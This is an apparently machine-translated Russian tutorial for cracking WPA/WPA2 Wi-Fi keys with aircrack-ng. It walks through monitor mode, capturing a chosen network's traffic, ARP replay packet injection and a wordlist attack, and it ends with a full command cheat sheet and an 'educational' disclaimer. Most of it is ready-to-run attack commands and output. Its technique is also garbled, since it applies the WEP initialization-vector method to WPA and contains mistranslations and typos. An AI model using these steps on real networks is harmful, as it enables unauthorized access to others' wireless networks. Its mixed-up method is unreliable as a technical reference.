Aircrack-ng — это, по сути, пакет сетевого программного обеспечения, созданный для достижения следующих целей:
Обратите внимание, что настоящее руководство не является исчерпывающим руководством, а скорее предназначено для формирования некоторых базовых навыков для проверки безопасности вашей собственной сети и ознакомления с концепциями.
Описанная ниже атака основана на пассивной технике (атака воспроизведения запроса ARP) и ориентирована на дистрибутивы на основе Debian, при условии, что у вас есть работающая беспроводная карта с уже исправленными для внедрения драйверами.
Aircrack-ng можно установить в операционную систему на базе Debian, скомпилировав исходный код (более подробную информацию можно найти на официальном сайте).
Ниже вы можете найти инструкции по установке основных требований для сборки aircrack-ng для операционных систем на базе Debian.
$ sudo apt install build-essential autoconf automake libtool pkg-config libnl-3-dev libnl-genl-3-dev libssl-dev ethtool shtool rfkill zlib1g-dev libpcap-dev libsqlite3-dev libpcre3-dev libhwloc-dev libcmocka-dev hostapd wpasupplicant tcpdump screen iw usbutils
Получите последнюю копию aircrack-ng:
$ git clone https://github.com/aircrack-ng/aircrack-ng
$ cd aircrack-ng
Для сборки aircrack-ng используется система сборки Autotools. Сначала ./configure
проект для сборки с соответствующими параметрами:
$ autoreconf -i
$ ./configure --with-experimental
Затем скомпилируйте проект с помощью команды make
и используйте цель установки из дополнительных целей, перечисленных ниже, для завершения установки.
make check
make integration
make install
make uninstall
Цель этого шага гарантирует, что ваша карта успешно поддерживает внедрение. Предполагая, что имя вашего интерфейса — «wlan0» (вы можете получить его, набрав iwconfig
на терминале), введите следующую команду:
# aireplay-ng --test wlan0
Система отвечает:
18:10:59 wlan0 channel: 10
18:10:59 Trying broadcast probe requests...
18:10:59 Injection is working!
18:11:00 Found 1 AP
...
Это подтверждает, что ваша карта может вводить пакеты.
Первое, что нужно сделать, — это найти потенциальную цель, которая переводит вашу беспроводную карту в режим мониторинга с помощью airmon-ng
. Однако настоятельно рекомендуется kill
все мешающие процессы перед использованием пакета aircrack-ng.
# airmon-ng check kill
Killing these processes:
PID Name
870 dhclient
1115 wpa_supplicant
Затем можно включить режим монитора, используемый для создания другого интерфейса (mon0):
# airmon-ng start wlan0
PHY Interface Driver Chipset
phy0 wlan0 ath9k Qualcomm Atheros AR9485
(monitor mode enabled for [phy0]wlan0 on [phy0]mon0)
Вы заметите, что «wlan0» успешно переведен в режим мониторинга. Затем запустите airodump-ng
для поиска сетей:
# airodump-ng mon0
Найдите беспроводную сеть, которую хотите взломать, и запишите ее BSSID и канал из следующих выходных данных:
CH 10 ][ Elapsed: 36 s][2019-05-15 18:15
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
...
Обратите внимание, что в верхней части выходных данных указана информация о точках доступа в радиусе действия, а в нижней части перечислены клиенты, подключенные к соответствующим точкам доступа.
Откройте еще один сеанс консоли, чтобы захватить исходные векторы, сгенерированные целью, и сохранить результат в файл:
# airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
где -c 10
— канал беспроводной сети, --bssid 08:00:BF:E6:31:2E
— MAC -w output-file
определяет выходные файлы, которые будут содержать векторы инициализации, и mon0
— имя интерфейса.
Система отвечает:
CH 10 ][ Elapsed: 12 s][2019-05-15 18:16
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
08:00:BF:E6:31:2E -21 100 5240 178307 338 10 54 WPA CCMP PSK infosec_router
BSSID STATION PWR Lost Packets Probes
08:00:BF:E6:31:2E 00:0F:35:51:AC:22 -21 0 183782
После выполнения команды будут созданы различные файлы.
Классическая атака повтора запроса ARP является наиболее эффективным способом создания новых векторов инициализации и работает очень надежно. Цель этого шага — запустить aireplay-ng
в режиме, который прослушивает запросы ARP, а затем повторно вводит их обратно в точку доступа. Оставьте airodump-ng
и aireplay-ng
включенными, откройте другой терминал и запустите атаку повтора запроса ARP:
# aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
Saving ARP requests in replay_arp-0321-191525.cap
You should also start airodump-ng to capture replies.
Read 618643 packets (got 304896 ARP requests), sent 194947 packets...
Вы можете проверить, внедряются ли пакеты, посмотрев на экран airodump-ng
.
На этом этапе вы сможете получить ключ WPA из векторов инициализации, собранных на предыдущих шагах. Для выполнения этой атаки вам понадобится список слов, и если сетевой пароль отсутствует в файле Word, вы не сможете взломать пароль. Обратите внимание, что большинство маршрутизаторов WPA/WPA2 оснащены надежными 12-значными случайными паролями, которые многие пользователи (справедливо) оставляют неизменными. Если вы пытаетесь взломать один из этих паролей, я рекомендую использовать списки паролей длины WPA.
Откройте еще один сеанс консоли и введите:
# aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output * .cap
где -a2
указывает режим атаки для WPA/WPA2-PSK, -w wordlist.txt
относится к вашему собственному списку слов словаря, а output*.cap
выбирает все выходные файлы с расширением .cap
.
Вот результат успешной атаки:
Aircrack-ng 1.5.2
[00:00:00] 192/1229 keys tested (520.04 k/s)
Time left: 0 seconds 15.62%
KEY FOUND! [ notsecure ]
Master Key : 42 28 5E 5A 73 33 90 E9 34 CC A6 C3 B1 CE 97 CA
06 10 96 05 CC 13 FC 53 B0 61 5C 19 45 9A CE 63
Transient Key : 86 D0 43 C9 AA 47 F8 03 2F 71 3F 53 D6 65 F3 F3
86 36 52 0F 48 1E 57 4A 10 F8 B6 A0 78 30 22 1E
4E 77 F0 5E 1F FC 73 69 CA 35 5B 54 4D B0 EC 1A
90 FE D0 B9 33 06 60 F9 33 4B CF 30 B4 A8 AE 3A
EAPOL HMAC : 8E 52 1B 51 E8 F2 7E ED 95 F4 CF D2 C6 D0 F0 68
Ниже вы можете найти список всех команд, необходимых для взлома сети WPA/WPA2.
# kill all interfering processes prior to using the aircrack-ng
airmon-ng check kill
# put your network device into monitor mode
airmon-ng start wlan0
# listen for all nearby beacon frames to get target BSSID and channel
airodump-ng mon0
# start listening for the handshake on a new console session
airodump-ng -c 10 --bssid 08:00:BF:E6:31:2E -w output-file mon0
# start the ARP request replay attack
aireplay-ng --arpreplay -b 08:00:BF:E6:31:2E -h 00:0F:35:51:AC:22 mon0
# run aircrack-ng to obtain the WPA key
aircrack-ng -a2 -b 08:00:BF:E6:31:2E -w wordlist.txt output*.cap
Этот проект лицензируется по лицензии MIT — подробности см. в файле ЛИЦЕНЗИИ.
Это руководство было создано только в образовательных целях, я не пропагандирую вредоносные действия и не несу ответственности за любую незаконную деятельность.